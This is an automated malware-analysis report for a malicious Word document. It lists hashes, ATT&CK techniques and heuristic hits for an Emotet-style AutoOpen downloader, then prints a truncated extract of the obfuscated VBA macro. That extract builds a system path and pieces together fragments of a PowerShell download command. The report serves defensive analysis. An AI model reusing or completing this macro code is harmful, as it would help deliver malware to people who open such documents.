Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 78e9a294117a15bd…

MALICIOUS

Office (OLE)

190.0 KB Created: 2018-11-07 02:19:23 Authoring application: Microsoft Office Word First seen: 2019-04-18
MD5: 0db588c76cb4b0ba5c6467c53c69d86e SHA-1: f571940792608147fd87fce9008c296d3b8c600a SHA-256: 78e9a294117a15bd922456559e1550e68e367b98357ec92309fbd10e2801af55
250 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains a VBA macro with an AutoOpen subroutine, which is a common technique for executing malicious code upon opening the document. The macro utilizes Shell() and CreateObject() calls, indicating an attempt to download and execute a secondary payload. The presence of a ClamAV detection for 'Doc.Malware.Emodldr-6769670-0' further supports its malicious nature.

Heuristics 8

  • ClamAV: Doc.Malware.Emodldr-6769670-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emodldr-6769670-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.iec.ch In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 45751 bytes
SHA-256: 44577d6f88a3fde9027101d9e2143b3b8fbf55803e553d70a73e9767f8dc0dfd
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Sub AutoOpen()

bdhuayks = "u" Like "o"
xgxleyrd = -25358
aeytja49 = 58819
eqrkczh = (xgxleyrd Xor aeytja49)
meundngb = 5958
auvtepi = -6107
euonr = (meundngb Xor auvtepi)
hjjcpcjgi = "$iumed"
ycgcdfvm = "qzd" Like "vrtvwgbsu7"
unuakko = -33099
ooefu6 = 45149
jiojz55 = (unuakko Xor ooefu6)


lbzeyl = -21603
thvhynxn = 42082
yufdave = (lbzeyl Or thvhynxn)

blvey10 = 17048
ymvln80 = -23503
tdktti4 = (blvey10 Or ymvln80)

beey = -7180
rsildlxps = 31238
nvupme = (beey Xor rsildlxps)
rpoaeg = Array("Fil';$sao='m")(0)
lfbbkbudx70 = "oksuuqzbwo" Like "gbxatxah"
oayz = "twerbxebsu" Like "o"

bhnepgw = -41734
hqyjrj = -49869
ewfpefhdg = (bhnepgw Xor hqyjrj)
mdzllu9 = 16793
oioa03 = 65210
aoup = (mdzllu9 Xor oioa03)
yxhae31 = 15582
uluub = 18477
yqwae = (yxhae31 Xor uluub)
psruu = "system"
ltbrsze = "root"
jgeehst = "rwcgsrnqd" Like "rmwqmnonyyag"
rdasre = psruu & ltbrsze
hesciy0 = 43780
qfoiicj5 = -6882
eshuiphy = (hesciy0 Or qfoiicj5)
ixrqyqhe = -21643
wcioisdc = -16710
yvdfeu8 = (ixrqyqhe Or wcioisdc)
djsiga = "wpwd" Like "fmetduodb"
brooubq = "dadaaxktfg" Like "md"
orxevla = "jlplgx" Like "uqdixd"
gvsverpli = "';$ayoef"
yabai = 47257
iedb10 = 63270
jjpugo = (yabai Or iedb10)
cyhqodpu26 = -10702
oqwybx = -5151
hojzu = (cyhqodpu26 Xor oqwybx)
maaew = "egl" Like "b"
oriz = -9567
jiarr = 13252
krviavxdj = (oriz Xor jiarr)

iaaoi = 12727
aaichuu = 30047
mrwhjnp = (iaaoi Xor aaichuu)
effemhi = Array("holryv07=")(0)
oiytsa9 = "qykielppnhjqa" Like "ui"

nkaudxgdi = "shaefots" Like "ielupmyby2"

mozgvm = "enwanmitmu" Like "iirdqrijtv"
hjhxvht = "y" Like "oasgyjoaeve"
oooa = "f='et-';$yd"
nmru = -28560
yyfuemn = -52217
wjtnijfb = (nmru Or yyfuemn)
cskaqv = "gaieo43" Like "e"

jqqqucgp = "ooklxhjacnsza2" Like "dontvv"
vfprto = -22282
omyeamk = 3745
uyash = (vfprto Or omyeamk)

zpleca = "yferlipk" Like "stoiesc"
vtjuu = "esf" Like "qfzomyll9"
rnlodwi3 = Array("eakk='en")(0)
geooy = 60102
udhpqrjk = 22975
reoyi = (geooy Or udhpqrjk)

kebgxff90 = "tmeszoia" Like "stqmei"
uzio = -54789
lfrueih = 25314
oacxokdhh59 = (uzio Or lfrueih)

gayy = -24234
owvy0 = -47545
aeiqwvc = (gayy Xor owvy0)
oedhfidd = "wz" Like "crhoqwkecllnln"

eicgbopmh = Environ(rdasre)
uwfou = -14226
uoyuo = -22486
diyor24 = (uwfou Or uoyuo)


vfarsoi24 = Array("ais='/wp-cont';")(0)
fouyybl3 = 31317
tzhvncu = 24249
yicdf = (fouyybl3 Xor tzhvncu)

tstmwiua = "nxfupaaa" Like "wrytatnwr"

yojcdhp = "a" Like "k"
yljmsc = "dxh" Like "ygmwoaqwu"
tuolxyj = "$woeeavn='e"
eulhyt = -46793
wscgeiu = -18653
dkzkjo = (eulhyt Or wscgeiu)
ojao = -29222
otuoob = -65925
zfvjlodg = (ojao Or otuoob)
sapmvmq = 2567
bwbnmo = 30931
xyocyy = (sapmvmq Xor bwbnmo)


irqusmj24 = "hynqhrnuakr" Like "o"
xzyqmak = -65518
yoriyh2 = 31420
tgssgiexh = (xzyqmak Or yoriyh2)
iesie = -58754
oxkqjb = -56038
ylfli62 = (iesie Or oxkqjb)
glaiwba = "\system"
mzbervu = "u" Like "dmmgcx"
ouxxhpi3 = "jvbm" Like "msqykaomh0"
ixhhe = "bfurxyanv5" Like "zplojucbo1"
iyui = 37113
hprqbpr = -22013
ootqbj1 = (iyui Or hprqbpr)

auaoult = 30989
ceei33 = 9156
idfttni = (auaoult Xor ceei33)
eicgbopmh = eicgbopmh + glaiwba
heuez = "tcswvhqsgqs" Like "xwyag"
krwnkxeq = "yuwnnwifucq" Like "yazsg"

asod = -6790
iuuj5 = 8844
imnvvae = (asod Or iuuj5)

aecax = "v07+$tp"
uwzny = "j" Like "kgoghztlvygrco0"
dwmoxxctq = 55428
ktpyom = -51836
lhjau39 = (dwmoxxctq Or ktpyom)
zjbyduo30 = "tmspwytxg" Like "aiuefcympvpn"


bneueiv = "yauvo" Like "epaj"
lvxkox94 = "auaofpymar" Like "ljoeizpbt"
ikqqakt64 = "'ent).Do';$imzooge='bject Sys'"
nesbs = "euaju" Like "iiswmfpiqwf"
fusuyc = "eaeey" Like "wyqeaoo93"

yvxtkx = "hl" Like "itlplkdnmabbt4"
winaoa = "o" Like "h
... (truncated)